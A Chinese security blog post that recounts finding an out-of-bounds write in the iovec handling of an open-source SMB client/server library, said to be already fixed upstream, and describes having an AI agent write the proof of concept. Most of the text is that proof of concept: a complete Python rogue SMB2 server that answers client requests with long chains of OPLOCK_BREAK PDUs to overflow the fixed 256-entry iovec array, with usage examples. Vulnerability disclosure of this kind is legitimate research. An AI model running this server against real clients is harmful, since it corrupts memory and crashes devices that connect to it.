Zj_W1nd's BLOG

"Vibe SecurityReserch": 我是如何用ai发现0day并撰写poc的

2025/08/26

截止到该文档发布,相关漏洞均已在公司内部和上游修复

故事的开始

在某安全实验室实习期间,我主要的工作是开发一个基于大模型的漏洞扫描工具,然后挖点漏洞,因此有了这个目标。这一目标是公司内某些产品的开源依赖,和上游作者沟通的时候提到,这个库的计划是用于各类小型嵌入式设备和老式游戏机(PS2, wii, xbox 360…)的,完全不清楚为什么如此重要的终端设备会用到这个库。

漏洞本身

审计入口

这个库是一个轻量化的SMB协议库,即微软(主要就是windows)的远程文件共享。顺带一提,大名鼎鼎的永恒之蓝就是windows上这个smb服务出的问题。

其实一开始,我是发现公司内和上游的commit修改不同步的。有许多最新的问题修复没有同步过来,甚至包括一些很离谱的栈溢出问题。但仔细审计后发现主要的漏洞都存在于服务端,我们负责的产品主要是使用了客户端代码(是的,这个库是一套代码两个逻辑,同一个函数内会有两种不同实现,中间用大量的smb2_is_server判断当前是服务端还是客户端),因此供应链审计就没有获得什么好的收获。但我也在这过程中摸清了大致的处理逻辑,主要是找到了处理数据包的核心入口函数。

接下来就直接上工具了,简单来讲,工具的逻辑很简单粗暴,配置入口点后会自动迭代查找子函数调用往下走并尝试扫描漏洞。扫描出来之后就是人工的核实工作。我分别选了数据包处理的入口还有自带测例的主函数做扫描。

💡 PS: 尽管我们想了各种办法降低误报率,但实际情况比我想象的严峻得多。

在C语言下,大量的指针,拉长的控制流,大模型幻觉等等因素会导致不可避免的误报:尽管局部来看它的确有模型所报告的问题,但其实从人类开发者视角下这里根本不可能是攻击面。

根因分析

根本原因其实很简单,这个库中存在太多的编码漏洞,而我们的工具识别到了比较严重的一个。该库对于数据包的读逻辑是使用了iovec+readv的模式,即用连续的iovec结构体数组(指针+长度)将离散的内存视为包装成连续的进行读取,读满一个iovec就下一个。

而iovec数组的最大长度是写死的256,在分配iovec(其实就是n++)的时候,不检查是否超过了上限,从而造成我们可以越界写一个指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
struct smb2_iovec *smb2_add_iovector(struct smb2_context *smb2,
struct smb2_io_vectors *v,
uint8_t *buf, size_t len,
void (*free)(void *))
{
struct smb2_iovec *iov = &v->iov[v->niov];
v->iov[v->niov].buf = buf;
v->iov[v->niov].len = len;
v->iov[v->niov].free = free;
v->total_size += len;
v->niov++; // what if niov > 256??? 😈
return iov;
}

如何利用?

接下来就是利用的问题了。首先这个漏洞最先引起我关注的是这里的逻辑:

1
2
3
4
5
6
7
8
9
10
is_chained = smb2->hdr.next_command;
//...
if (is_chained) {
/* Record at which iov we ended in this loop so we know where to start in the next */
iov_offset = smb2->in.niov - 1;
smb2->recv_state = SMB2_RECV_HEADER;
smb2_add_iovector(smb2, &smb2->in, &smb2->header[0],
SMB2_HEADER_SIZE, NULL);
goto read_more_data;
}

可以看到,整个客户端/服务端可以因为报文中的字段不做任何处理就循环分配add_iovector!这里也会成为我们攻击路上的一环。

但第一轮的POC其实并不理想,在人工审查日志加ai建议之后发现,客户端的请求会进入等待队列并被分配一个message_id,在收到响应的时候,如果队列里找不到这个pdu就会报错退出。但是有一个命令能帮我们绕过这个问题:SMB2_OPLOCK_BREAK.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
if (smb2->hdr.command != SMB2_OPLOCK_BREAK) {
if (smb2->pdu) {
smb2_free_pdu(smb2, smb2->pdu);
smb2->pdu = NULL;
}
pdu = smb2->pdu = smb2_find_pdu(smb2, smb2->hdr.message_id);
if (pdu == NULL) {
smb2_set_error(smb2, "no matching PDU found");
return -1;
}
SMB2_LIST_REMOVE(&smb2->waitqueue, pdu);
} else {
/* oplock and lease break notifications won't have a pdu */
pdu = smb2->pdu;
if (!pdu) {
pdu = smb2->pdu = smb2_allocate_pdu(smb2, SMB2_OPLOCK_BREAK,
smb2_oplock_break_notify, NULL);
}
if (pdu == NULL) {
smb2_set_error(smb2, "can not alloc pdu");
return -1;
}
}

这个命令具体的作用其实在poc中并不重要(似乎是一个文件锁)。但走这条路径,我们就可以无脑把PDU串起来发,–当然要在响应一个正常请求之后。

纯粹AI的poc:

下面是我用vscode的gpt-5 agent撰写的漏洞poc。这个POC我没有阅读任何的哪怕一行代码,是直接在对话上下文中告诉了它整个漏洞的成因,触发路径,完全由ai自主编写的。当然在跑不通的时候,我会问ai为什么发生了什么,但这个poc我的确没有自己改过任何一行代码,永远是对话-运行-反馈的循环。

其实撰写这个POC的过程最令我惊讶的是大模型的准确率。显然它十分充分地理解smb协议的每个步骤,每个报文里的每个字节都是什么。事实上,AI完全使用struct.pack这个方法来构造报文,而且在一个POC撰写完成后我就可以直接运行它然后在wireshark中观察交互的情况。

最终,在将claude sonnet 4换成gpt5后,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
#!/usr/bin/env python3
"""
SMB2 链式 PDU 测试服务器
用于测试 SMB2 客户端的链式 PDU 处理能力
"""

import socket
import struct
import threading
import time
import sys
import argparse
from binascii import hexlify, unhexlify
import logging

# 配置日志
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s: %(message)s')
logger = logging.getLogger(__name__)

class ArchSMB2TestServer:
def __init__(self, host='0.0.0.0', port=445, debug_mode=False):
self.host = host
self.port = port
self.clients_served = 0
self.debug_mode = debug_mode
self.chain_count = 3 # 链式PDU的默认数量

if self.debug_mode:
logging.getLogger().setLevel(logging.DEBUG)
logger.info("调试模式已启用")

def create_smb2_header(self, command=0x0000, status=0x00000000,
message_id=0, session_id=0, tree_id=0,
next_command=0, flags=0x00000001):
"""创建标准 SMB2 头部 (64字节)"""
try:
header = struct.pack('<4s', b'\xFE\x53\x4D\x42') # Protocol: SMB2
header += struct.pack('<H', 64) # StructureSize
header += struct.pack('<H', 0) # CreditCharge
header += struct.pack('<L', status) # Status
header += struct.pack('<H', command) # Command
header += struct.pack('<H', 1) # CreditRequest
header += struct.pack('<L', flags) # Flags
header += struct.pack('<L', next_command) # NextCommand ★关键
header += struct.pack('<Q', message_id) # MessageId
header += struct.pack('<L', 0) # Reserved
header += struct.pack('<L', tree_id) # TreeId
header += struct.pack('<Q', session_id) # SessionId
header += struct.pack('<16s', b'\x00' * 16) # Signature

return header
except Exception as e:
logger.error(f"创建SMB2头部失败: {e}")
return None

def create_negotiate_response_payload(self):
"""创建协商响应载荷"""
# SMB2 NEGOTIATE Response 结构
payload = struct.pack('<H', 65) # StructureSize
payload += struct.pack('<H', 0) # SecurityMode
payload += struct.pack('<H', 0x0311) # DialectRevision (SMB 3.1.1)
payload += struct.pack('<H', 0) # NegotiateContextCount
payload += struct.pack('<16s', b'A' * 16) # ServerGuid
payload += struct.pack('<L', 0x07) # Capabilities
payload += struct.pack('<L', 65536) # MaxTransactSize
payload += struct.pack('<L', 65536) # MaxReadSize
payload += struct.pack('<L', 65536) # MaxWriteSize
payload += struct.pack('<Q', int(time.time())) # SystemTime
payload += struct.pack('<Q', int(time.time())) # ServerStartTime
payload += struct.pack('<H', 0) # SecurityBufferOffset
payload += struct.pack('<H', 0) # SecurityBufferLength
payload += struct.pack('<L', 0) # NegotiateContextOffset

return payload

def create_session_setup_response(self, message_id=0):
"""创建SMB2 Session Setup响应"""
# 创建Session Setup响应头部
header = self.create_smb2_header(
command=0x0001, # SMB2_SESSION_SETUP
message_id=message_id,
next_command=0,
status=0x00000000, # STATUS_SUCCESS
flags=0x00000001 # SERVER_TO_REDIR
)

if not header:
return b''

# Session Setup Response payload
payload = struct.pack('<H', 9) # StructureSize
payload += struct.pack('<H', 0) # SessionFlags
payload += struct.pack('<H', 0) # SecurityBufferOffset
payload += struct.pack('<H', 0) # SecurityBufferLength
payload += b'' # SecurityBuffer (empty)

return header + payload

def create_tree_connect_response(self, message_id=0):
"""创建SMB2 Tree Connect响应"""
# 创建Tree Connect响应头部
header = self.create_smb2_header(
command=0x0003, # SMB2_TREE_CONNECT
message_id=message_id,
next_command=0,
status=0x00000000, # STATUS_SUCCESS
flags=0x00000001, # SERVER_TO_REDIR
tree_id=1 # 分配一个TreeID
)

if not header:
return b''

# Tree Connect Response payload
payload = struct.pack('<H', 16) # StructureSize
payload += struct.pack('<B', 1) # ShareType (DISK)
payload += struct.pack('<B', 0) # Reserved
payload += struct.pack('<L', 0x1f01ff) # ShareFlags
payload += struct.pack('<L', 0x00000000) # Capabilities
payload += struct.pack('<L', 0x01006001) # MaximalAccess

return header + payload

def create_normal_smb2_response(self, command=0x0000, message_id=0):
"""创建正常的单个SMB2响应(非链式)"""
# 创建正常的SMB2头部
header = self.create_smb2_header(
command=command,
message_id=message_id,
next_command=0, # 单个PDU,不链式
status=0x00000000, # STATUS_SUCCESS
flags=0x00000001 # SERVER_TO_REDIR
)

if not header:
return b''

# 根据命令类型创建相应载荷
if command == 0x0000: # NEGOTIATE
payload = self.create_negotiate_response_payload()
elif command == 0x0001: # SESSION_SETUP
payload = struct.pack('<H', 9) # StructureSize
payload += struct.pack('<H', 0) # SessionFlags
payload += struct.pack('<H', 0) # SecurityBufferOffset
payload += struct.pack('<H', 0) # SecurityBufferLength
elif command == 0x0003: # TREE_CONNECT
payload = struct.pack('<H', 16) # StructureSize
payload += struct.pack('<B', 1) # ShareType (DISK)
payload += struct.pack('<B', 0) # Reserved
payload += struct.pack('<L', 0x1f01ff) # ShareFlags
payload += struct.pack('<L', 0x00000000) # Capabilities
payload += struct.pack('<L', 0x01006001) # MaximalAccess
elif command == 0x0005: # CREATE
payload = struct.pack('<H', 89) # StructureSize
payload += struct.pack('<B', 0) # OplockLevel
payload += struct.pack('<B', 0) # Flags
payload += struct.pack('<L', 1) # CreateAction
payload += struct.pack('<Q', 0) # CreationTime
payload += struct.pack('<Q', 0) # LastAccessTime
payload += struct.pack('<Q', 0) # LastWriteTime
payload += struct.pack('<Q', 0) # ChangeTime
payload += struct.pack('<Q', 0) # AllocationSize
payload += struct.pack('<Q', 0) # EndofFile
payload += struct.pack('<L', 0x80) # FileAttributes
payload += struct.pack('<L', 0) # Reserved2
payload += b'\x01\x00\x00\x00' * 4 # FileId (16 bytes)
payload += struct.pack('<L', 0) # CreateContextsOffset
payload += struct.pack('<L', 0) # CreateContextsLength
else:
# 其他命令的基本响应
payload = struct.pack('<H', 8) + b'\x00' * 14

# 组合完整响应
smb2_response = header + payload

# 添加NetBIOS头部
netbios_header = struct.pack('>L', len(smb2_response))

return netbios_header + smb2_response

def create_chain_pdu_sequence(self, base_command=0x0003, pdu_count=None, original_message_id=0):
"""创建链式 PDU 序列 - 使用混合攻击策略绕过message_id检查"""
if pdu_count is None:
pdu_count = self.chain_count

logger.info(f"🚨 生成混合攻击链式PDU序列:")
logger.info(f" - 第1个PDU: {self.get_command_name(base_command)} (message_id={original_message_id}) - 通过验证")
logger.info(f" - 后{pdu_count-1}个PDU: OPLOCK_BREAK (任意message_id) - 绕过验证")
logger.info(f" - 总PDU数量: {pdu_count} 个,用于触发缓冲区溢出")

pdus = []

for i in range(pdu_count):
# 第一个PDU使用原始命令和message_id,后续PDU使用OPLOCK_BREAK绕过检查
if i == 0:
# 第一个PDU:使用正常命令,确保通过message_id匹配
current_command = base_command
msg_id = original_message_id
logger.debug(f"PDU {i+1}: 使用正常命令 {self.get_command_name(current_command)}, message_id={msg_id}")
else:
# 后续PDU:使用OPLOCK_BREAK绕过message_id检查
current_command = 0x0012 # SMB2_OPLOCK_BREAK = 18 = 0x12
msg_id = 0x999 + i # 任意message_id,不需要匹配
logger.debug(f"PDU {i+1}: 使用OPLOCK_BREAK绕过检查, message_id={msg_id}")

# 根据命令类型创建载荷
if current_command == 0x0012: # OPLOCK_BREAK
# OPLOCK_BREAK Response payload (24字节)
payload = struct.pack('<H', 24) # StructureSize
payload += struct.pack('<B', 0) # OplockLevel
payload += struct.pack('<B', 0) # Reserved
payload += struct.pack('<L', 0) # Reserved2
payload += b'\x01\x00\x00\x00' * 4 # FileId (16 bytes)
elif current_command == 0x0000: # NEGOTIATE
payload = self.create_negotiate_response_payload()
elif current_command == 0x0003: # TREE_CONNECT
payload = struct.pack('<H', 16) # StructureSize
payload += struct.pack('<B', 1) # ShareType (DISK)
payload += struct.pack('<B', 0) # Reserved
payload += struct.pack('<L', 0x1f01ff) # ShareFlags
payload += struct.pack('<L', 0x00000000) # Capabilities
payload += struct.pack('<L', 0x01006001) # MaximalAccess
elif current_command == 0x0001: # SESSION_SETUP
payload = struct.pack('<H', 9) # StructureSize
payload += struct.pack('<H', 0) # SessionFlags
payload += struct.pack('<H', 0) # SecurityBufferOffset
payload += struct.pack('<H', 0) # SecurityBufferLength
elif current_command == 0x0005: # CREATE
payload = struct.pack('<H', 89) # StructureSize
payload += struct.pack('<B', 0) # OplockLevel
payload += struct.pack('<B', 0) # Flags
payload += struct.pack('<L', 1) # CreateAction
payload += struct.pack('<Q', 0) # CreationTime
payload += struct.pack('<Q', 0) # LastAccessTime
payload += struct.pack('<Q', 0) # LastWriteTime
payload += struct.pack('<Q', 0) # ChangeTime
payload += struct.pack('<Q', 0) # AllocationSize
payload += struct.pack('<Q', 0) # EndofFile
payload += struct.pack('<L', 0x80) # FileAttributes
payload += struct.pack('<L', 0) # Reserved2
payload += b'\x01\x00\x00\x00' * 4 # FileId (16 bytes)
payload += struct.pack('<L', 0) # CreateContextsOffset
payload += struct.pack('<L', 0) # CreateContextsLength
else:
# 其他命令的基本响应
payload = struct.pack('<H', 8) + b'\x00' * 14

# 8字节对齐填充 - 关键!参考smb2_read_data的处理方式
while len(payload) % 8 != 0:
payload += b'\x00'

# 计算 NextCommand 偏移 - 参考libsmb2的链式PDU处理
if i < pdu_count - 1:
# SMB2头部(64字节) + 载荷长度,然后8字节对齐
next_offset = ((64 + len(payload)) + 7) & ~7
else:
next_offset = 0 # 最后一个PDU,NextCommand=0表示链式结束

# 创建PDU头部
header = self.create_smb2_header(
command=current_command, # 第一个用原始命令,后续用OPLOCK_BREAK
message_id=msg_id, # 第一个用原始message_id,后续任意
next_command=next_offset, # 链式偏移
status=0x00000000, # STATUS_SUCCESS
flags=0x00000001, # SERVER_TO_REDIR
tree_id=1 if current_command == 0x0003 else 0,
session_id=1 if current_command in [0x0001, 0x0003] else 0
)

if not header:
logger.error(f"创建第 {i} 个PDU头部失败")
continue

# 组装PDU(头部+载荷)
complete_pdu = header + payload

# 确保整个PDU 8字节对齐(参考libsmb2处理方式)
while len(complete_pdu) % 8 != 0:
complete_pdu += b'\x00'

pdus.append(complete_pdu)

logger.debug(f"混合攻击PDU {i+1}/{pdu_count}: Command={self.get_command_name(current_command)}, MessageID={msg_id}, NextCommand=0x{next_offset:08X}, 长度={len(complete_pdu)}")

chain_data = b''.join(pdus)
logger.info(f"🚨 混合攻击链式PDU生成完成:")
logger.info(f" - 总大小: {len(chain_data)} 字节")
logger.info(f" - 攻击策略: 第1个PDU通过message_id验证,后续{pdu_count-1}个OPLOCK_BREAK PDU绕过验证")
logger.info(f" - 预期效果: 触发 {pdu_count * 4}+ 次smb2_add_iovector调用,导致缓冲区溢出")

return chain_data

def get_command_name(self, command):
"""获取SMB2命令名称"""
command_names = {
0x0000: "NEGOTIATE",
0x0001: "SESSION_SETUP",
0x0003: "TREE_CONNECT",
0x0005: "CREATE",
0x0006: "CLOSE",
0x0008: "READ",
0x0009: "WRITE",
0x0012: "OPLOCK_BREAK" # 18 = 0x12
}
return command_names.get(command, f"UNKNOWN(0x{command:04X})")
def handle_client_connection(self, client_socket, client_addr):
"""处理客户端连接"""
client_id = self.clients_served
self.clients_served += 1

logger.info(f"[客户端 {client_id}] 连接来自: {client_addr}")

try:
# 持续处理SMB2请求
while True:
# 接收客户端请求
initial_data = client_socket.recv(8192)

if not initial_data:
logger.info(f"[客户端 {client_id}] 客户端关闭连接")
break

if len(initial_data) < 4:
logger.warning(f"[客户端 {client_id}] 接收到的数据太短")
continue

logger.info(f"[客户端 {client_id}] 接收到 {len(initial_data)} 字节数据")
logger.info(f"[客户端 {client_id}] 原始数据前32字节: {hexlify(initial_data[:32])}")

# 解析请求
response_data = None
smb2_command = None
message_id = 0

# 简单解析NetBIOS头部
if len(initial_data) >= 4:
nb_length = struct.unpack('>L', initial_data[:4])[0]
logger.info(f"[客户端 {client_id}] NetBIOS长度: {nb_length}")

# 解析SMB2头部
if len(initial_data) >= 68: # NetBIOS(4) + SMB2头部(64)
smb2_data = initial_data[4:]
if smb2_data[:4] == b'\xFE\x53\x4D\x42':
smb2_command = struct.unpack('<H', smb2_data[12:14])[0]
message_id = struct.unpack('<Q', smb2_data[24:32])[0]
logger.info(f"[客户端 {client_id}] SMB2命令: 0x{smb2_command:04X} ({self.get_command_name(smb2_command)}), MessageID: {message_id}")

# 根据命令类型决定响应策略
if smb2_command in [0x0000, 0x0001, 0x0003]: # NEGOTIATE, SESSION_SETUP, TREE_CONNECT
# 这些基础握手命令始终返回单个正常响应(非链式)
logger.info(f"[客户端 {client_id}] 基础握手阶段:{self.get_command_name(smb2_command)},发送单个正常响应")
response_data = self.create_normal_smb2_response(command=smb2_command, message_id=message_id)
logger.info(f"[客户端 {client_id}] ✅ 发送单个{self.get_command_name(smb2_command)}响应(非链式)")

else:
# 其他SMB命令使用链式处理
logger.info(f"[客户端 {client_id}] 为{self.get_command_name(smb2_command)}生成链式响应")
chain_data = self.create_chain_pdu_sequence(base_command=smb2_command, pdu_count=self.chain_count, original_message_id=message_id)
netbios_header = struct.pack('>L', len(chain_data))
response_data = netbios_header + chain_data
logger.info(f"[客户端 {client_id}] ✅ 发送混合攻击链式{self.get_command_name(smb2_command)}响应(1个正常PDU + {self.chain_count-1}个OPLOCK_BREAK PDU)")

else:
logger.warning(f"[客户端 {client_id}] 非SMB2协议数据")
logger.info(f"[客户端 {client_id}] 协议标识: {hexlify(smb2_data[:4])}")
continue

# 发送响应
if response_data:
logger.info(f"[客户端 {client_id}] 响应大小: {len(response_data)} 字节")
logger.info(f"[客户端 {client_id}] 响应前64字节: {hexlify(response_data[:64])}")

# 分块发送
chunk_size = 4096
total_sent = 0
send_start_time = time.time()

while total_sent < len(response_data):
chunk_end = min(total_sent + chunk_size, len(response_data))
chunk = response_data[total_sent:chunk_end]

try:
sent = client_socket.send(chunk)
if sent == 0:
logger.error(f"[客户端 {client_id}] 发送失败,连接可能已断开")
break

total_sent += sent
logger.debug(f"[客户端 {client_id}] 发送进度: {total_sent}/{len(response_data)} 字节")

except socket.error as e:
logger.error(f"[客户端 {client_id}] 发送数据时出错: {e}")
break

# 添加小延时
time.sleep(0.01)

send_duration = time.time() - send_start_time
logger.info(f"[客户端 {client_id}] 总共发送: {total_sent}/{len(response_data)} 字节,耗时: {send_duration:.3f}秒")

else:
logger.warning(f"[客户端 {client_id}] 未生成响应数据")

# 等待观察客户端反应
try:
response = client_socket.recv(1024)
if response:
logger.info(f"[客户端 {client_id}] 收到后续数据: {len(response)} 字节")
logger.debug(f"[客户端 {client_id}] 后续数据: {hexlify(response[:64])}")
except Exception as e:
logger.info(f"[客户端 {client_id}] 读取后续数据异常: {e}")

except ConnectionResetError:
logger.warning(f"[客户端 {client_id}] 连接被对方重置")
except BrokenPipeError:
logger.warning(f"[客户端 {client_id}] 管道断开 - 客户端已断开连接")
except OSError as e:
if hasattr(e, 'errno') and e.errno == 104: # Connection reset by peer
logger.warning(f"[客户端 {client_id}] 连接被重置")
else:
logger.error(f"[客户端 {client_id}] 网络异常: {e}")
except Exception as e:
logger.error(f"[客户端 {client_id}] 处理异常: {e}")
import traceback
logger.debug(f"[客户端 {client_id}] 异常详情:\n{traceback.format_exc()}")
finally:
try:
client_socket.close()
logger.info(f"[客户端 {client_id}] 连接已关闭")
except:
pass

def start_server(self):
"""启动SMB2测试服务器"""
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

try:
server_socket.bind((self.host, self.port))
server_socket.listen(10)

logger.info(f"🚀 SMB2测试服务器已启动")
logger.info(f"🚀 监听地址: {self.host}:{self.port}")
logger.info(f"🚀 处理策略:")
logger.info(f" 📋 基础握手阶段 (NEGOTIATE/SESSION_SETUP/TREE_CONNECT): 发送单个正常响应")
logger.info(f" 🚨 其他SMB命令: 发送混合攻击链式PDU ({self.chain_count} 个)")
logger.info(f" 💥 攻击机制: 第1个PDU通过验证,后续OPLOCK_BREAK PDU绕过message_id检查")
logger.info(f"🚀 等待 SMB2 客户端连接...")

while True:
try:
client_socket, client_addr = server_socket.accept()

# 为每个客户端创建处理线程
client_thread = threading.Thread(
target=self.handle_client_connection,
args=(client_socket, client_addr),
daemon=True
)
client_thread.start()

except KeyboardInterrupt:
logger.info("收到中断信号,正在关闭服务器...")
break
except Exception as e:
logger.error(f"接受连接时出错: {e}")

except PermissionError:
logger.error(f"权限不足,无法绑定端口 {self.port}")
logger.error("请使用 sudo 运行,或者使用非特权端口 (>1024)")
sys.exit(1)
except Exception as e:
logger.error(f"服务器启动失败: {e}")
sys.exit(1)
finally:
server_socket.close()
logger.info("SMB2测试服务器已关闭")

def main():
parser = argparse.ArgumentParser(
description='SMB2 链式 PDU 测试服务器',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='''
使用示例:
sudo python3 smb_hack.py # 默认配置 (100个链式PDU)
python3 smb_hack.py -p 8445 --chain-count 200 # 非特权端口 + 200个链式PDU
python3 smb_hack.py -d --chain-count 50 # 调试模式 + 50个链式PDU

攻击策略:
• 基础握手阶段 (NEGOTIATE/SESSION_SETUP/TREE_CONNECT):
- 始终发送单个正常响应,确保连接建立成功
• 其他SMB命令 (CREATE/READ/WRITE/QUERY等):
- 第1个PDU: 使用正常命令和匹配的message_id,通过验证
- 后续PDU: 使用OPLOCK_BREAK命令,绕过message_id检查
- 目标: 触发大量smb2_add_iovector调用,导致缓冲区溢出

缓冲区溢出机制:
• libsmb2中smb2_io_vectors结构固定256个iovec数组
• smb2_add_iovector函数缺乏边界检查
• 每个PDU处理会调用4-5次smb2_add_iovector
• 200个PDU约触发1000+次调用,远超256限制
• OPLOCK_BREAK绕过message_id匹配,实现大规模链式攻击
'''
)

parser.add_argument('-H', '--host', default='0.0.0.0',
help='监听地址 (默认: 0.0.0.0)')
parser.add_argument('-p', '--port', type=int, default=445,
help='监听端口 (默认: 445)')
parser.add_argument('-d', '--debug', action='store_true',
help='启用调试模式,输出详细信息')
parser.add_argument('--chain-count', type=int, default=100,
help='链式PDU的数量 (默认: 100, 范围: 1-300) - 大量PDU用于触发缓冲区溢出')

args = parser.parse_args()

# 验证链式PDU数量范围
if args.chain_count < 1 or args.chain_count > 300:
logger.error("链式PDU数量必须在1-300之间")
sys.exit(1)

# 权限检查
if args.port < 1024 and os.geteuid() != 0:
logger.error(f"使用特权端口 {args.port} 需要 root 权限")
logger.error("请使用 sudo 运行,或选择端口 >= 1024")
sys.exit(1)

# 创建并启动测试服务器
test_server = ArchSMB2TestServer(
host=args.host,
port=args.port,
debug_mode=args.debug
)

# 设置链式PDU数量
test_server.chain_count = args.chain_count

logger.info(f"🚨 混合攻击链式PDU数量: {args.chain_count}")
logger.info(f"💥 攻击策略: 第1个PDU通过message_id验证,后续{args.chain_count-1}个OPLOCK_BREAK PDU绕过验证")
logger.info(f"🎯 目标: 触发约{args.chain_count * 4}次smb2_add_iovector调用,超过256限制引发缓冲区溢出")

try:
test_server.start_server()
except KeyboardInterrupt:
logger.info("用户中断,程序退出")
sys.exit(0)

if __name__ == "__main__":
import os
main()
CATALOG
  1. 1. 故事的开始
  2. 2. 漏洞本身
    1. 2.1. 审计入口
    2. 2.2. 根因分析
  3. 3. 如何利用?
  4. 4. 纯粹AI的poc: